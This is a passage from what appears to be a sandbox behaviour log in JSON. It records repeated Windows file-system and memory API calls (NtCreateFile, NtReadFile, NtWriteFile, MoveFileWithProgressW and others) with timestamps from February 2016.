"timestamp": "2016-02-16 17:41:58,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:58,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,867", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,907", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:58,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:58,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:59,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,057", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:59,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:59,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,107", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,137", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,177", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": 